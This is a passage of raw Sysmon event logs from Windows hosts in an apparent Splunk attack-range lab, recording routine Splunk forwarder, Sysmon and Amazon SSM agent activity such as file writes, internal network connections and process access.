Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287226Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:04.126{C8EA50B7-10E4-6216-F904-000000003802}6100C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000216200Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:05.983{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C1BDABEC7D0CA80B8AB794A752609A3,SHA256=9DACF85F1EE5B5EBE73E1A86E28EC4796333593BE6A631FA56F86048D70C9725,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287237Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:05.485{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16945BA8358CF0FE34708B71EAF6FC59,SHA256=C2BA934CCDA188F6FE575D6ADFEF5C9E98E7378A49357C5C3F3EEE0F167A6B02,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216199Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:03.564{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51309-false10.0.1.12-8000- 23542300x8000000000000000287238Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:06.532{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B807B0D46F808ED736A33DE7C3974933,SHA256=32E21DECE41A93E16530FFF8B059B6A51E14CF6A1F49C4373045E3EF3EC0BB8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287240Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:07.563{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B13C9E2E44DC16739CCDC121FB737ABE,SHA256=F7D1D6453D8F5EC189465206C2F64F92D23A8BD698F961ED8E07461983D07DF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216201Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:06.999{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9374C92BF82C471B6E8B2B1CD214C468,SHA256=20095EF2BA609C80B7E89E4C50ED343BD9075B167E856F82981A8A53B38021AB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287239Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:04.677{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53401-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000287241Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:08.594{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AAE8CDA89AA4C6B6511742B60F7B5B4,SHA256=C897AF0783AA0F93D251D09A6E95CF565A8A157CA74D8E8F1B8A1E77D7B7F9A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216202Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:08.014{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECD2141FB3203866005652D599AC4909,SHA256=E2EA90B8739F6517A84E0B23A7E598A13D323C42DBE564CA14E4CC8896021823,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287242Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:09.688{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB013A0F13C9D4CEA5EE9092A4CE7C68,SHA256=DE7D0E8D8C95ECBFCED953FB2C16C7E0572C06A412B391C24E15000050606B67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216203Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:09.030{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5ACE093F7686C1EE071439F532F4A81,SHA256=902CE5237BFCFCB356BBF0689F82D77748EE9EFB58A628B97F5C2EA5598F1B6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287243Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:10.907{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F2CA17458408E0EF337DD7E2490774C,SHA256=76C31DE0A32966182DA04911DC1E172A0D68AB44026FF09D33ED62575C4D6069,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216204Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:10.045{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B714F4AB9796900D680CB5B169D6C5A7,SHA256=BA42EC5062579E3F6028C1FC1F25E75B9C07E28132C0C4C6ECF83B472AD60ACE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287244Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:11.938{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8BD900C7E080E7D82AF9B93F982242F,SHA256=FDF69D0BB7C79897797790A73F6A43CFE56AAD272A7E85253FCD2A390C753263,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216206Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:09.564{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51310-false10.0.1.12-8000- 23542300x8000000000000000216205Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:11.045{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08C4498F14556F6912B2ECF4F93C2237,SHA256=33E98D32246E71C3E8A84EA9C079BC7861605ADEDF6B95EE439741B2AC3DE34A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287246Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:12.971{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FB7EC02DE2BC77089DBC12B646A7D67,SHA256=DDC007F9B781A474C6FD79615212D9A917EDE94F05981A476B7690DCFD446274,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216207Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:12.045{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4F3DF1A571393D95B89C89B18C35B9B,SHA256=0CABC2735CD0BC3098FB75476E6BE0893861B0E18C1CB1C0D21BE111C3E2C505,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287245Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:12.395{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-131MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287249Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:13.973{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46672ABC07F6315A8815188B330967D6,SHA256=1325F6EE0A13535AD0F88FCF1D5F6D8BB0B7325487E9542ED75330B63ED9538C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216208Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:13.092{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F6E2CF2E1E4CB6482D87D334054670C,SHA256=BBAEE39870A7E400A0A88DC919DFEB7FB503EE92E417648D385A593CD5DAF995,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287248Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:13.394{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-132MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287247Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:10.614{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53402-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000287250Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:14.988{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDEE90FAC210771FBAAD597493C8D3D2,SHA256=6CD3123E41F0567A84458391E0124BB100D1A322302F68808FF0B9A4F3844D99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216209Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:14.295{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5D4BE89F25F5C30BA82B1D0A4BEDD79,SHA256=6DEB01E041A256A96A41D11FEFD6DE595A61644F280B4416D4862A37D15C613B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216210Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:15.327{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B22E6B9FE330A2AFC559B699D2F33203,SHA256=9CBA2D525435E33F9EDAC27C129E5D58BBC508133796C3F0687B7F6CECBAF08F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216211Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:16.436{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E26333EBA627FA589FE7F22DE6B167E,SHA256=4FB77AA92C5256046F15B4E0BE5A7406DF00F81832E27D0700DE7F916E273137,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287251Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:16.020{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80F69A130C211A2C5E82BA3BBB00AC6A,SHA256=03CC34C6C1CBFF4869CA759A76754775A86B585DBF381D25A5ACDFD248F47497,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216212Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:17.608{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B25285252DD1DD5AAA742A832695DF71,SHA256=32943875D790175079D7F93CE77A3BB1DC600852FC18AAE6EC782E7FEA14D5A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287252Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:17.066{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A46A8974B8F40B5B20AFE6C249A0454,SHA256=367AE8EACC2F7E112D55A380A00D1AFF5D5FBFD87EC77C83F8E80D5BEA61BEAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216214Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:18.826{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C193F0FE589B35D4BEF996BA0C4390F9,SHA256=E7F154D89FB4965A3483C958825026C8DEB055024093297D15A07D8480642D72,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287254Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:15.621{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53403-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000287253Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:18.098{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90817DDB2C7CBE60385B4DE48ED4D662,SHA256=1BF1A176E813C693D3568FBBD8C251C20851777802AF1F4EE200E27F1AC73AF8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216213Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:15.579{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51311-false10.0.1.12-8000- 10341000x8000000000000000287272Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:19.957{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-10F3-6216-FB04-000000003802}5496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287271Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:19.957{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287270Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:19.957{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287269Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:19.957{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287268Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:19.957{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287267Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:19.957{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-10F3-6216-FB04-000000003802}5496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287266Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:19.957{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-10F3-6216-FB04-000000003802}5496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287265Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:19.958{C8EA50B7-10F3-6216-FB04-000000003802}5496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" 